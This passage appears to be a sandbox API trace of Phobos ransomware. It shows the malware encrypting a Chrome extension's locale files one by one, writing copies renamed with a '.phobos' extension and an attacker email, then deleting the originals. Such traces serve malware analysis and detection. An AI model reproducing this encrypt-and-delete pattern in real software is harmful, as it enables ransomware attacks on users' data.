pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.531] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.531] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.531] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.531] CloseHandle (hObject=0x130) returned 1 [0154.532] CloseHandle (hObject=0x14c) returned 1 [0154.532] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json")) returned 1 [0154.533] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.533] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=172) returned 1 [0154.533] CloseHandle (hObject=0x14c) returned 1 [0154.534] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json")) returned 0x2020 [0154.534] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.534] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.534] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.534] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0154.535] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.535] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xac, lpOverlapped=0x0) returned 1 [0154.535] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0154.535] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb0, lpOverlapped=0x0) returned 1 [0154.536] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0154.536] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.536] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.536] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.536] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.536] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.536] CloseHandle (hObject=0x14c) returned 1 [0154.536] CloseHandle (hObject=0x130) returned 1 [0154.537] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json")) returned 1 [0154.537] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.538] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=193) returned 1 [0154.538] CloseHandle (hObject=0x130) returned 1 [0154.538] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json")) returned 0x2020 [0154.538] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.538] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.538] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.540] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0154.540] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.540] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xc1, lpOverlapped=0x0) returned 1 [0154.541] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0154.541] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0154.542] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0154.542] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.542] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.542] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.542] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.542] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.542] CloseHandle (hObject=0x130) returned 1 [0154.542] CloseHandle (hObject=0x14c) returned 1 [0154.543] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json")) returned 1 [0154.543] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.544] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=298) returned 1 [0154.544] CloseHandle (hObject=0x14c) returned 1 [0154.544] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json")) returned 0x2020 [0154.544] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.544] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.544] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.545] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0154.545] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.545] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x12a, lpOverlapped=0x0) returned 1 [0154.546] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x130, dwBufLen=0x130 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x130) returned 1 [0154.546] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x130, lpOverlapped=0x0) returned 1 [0154.547] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0154.547] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.547] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.547] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.547] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.547] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.547] CloseHandle (hObject=0x14c) returned 1 [0154.547] CloseHandle (hObject=0x130) returned 1 [0154.547] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json")) returned 1 [0154.548] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.549] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=178) returned 1 [0154.549] CloseHandle (hObject=0x130) returned 1 [0154.549] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json")) returned 0x2020 [0154.549] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.549] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.549] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.550] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0154.550] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.550] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb2, lpOverlapped=0x0) returned 1 [0154.550] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0154.550] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0154.551] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0154.551] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.551] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.551] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.551] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.551] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.551] CloseHandle (hObject=0x130) returned 1 [0154.551] CloseHandle (hObject=0x14c) returned 1 [0154.552] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json")) returned 1 [0154.553] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.553] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=265) returned 1 [0154.553] CloseHandle (hObject=0x14c) returned 1 [0154.553] GetFileAttributesW 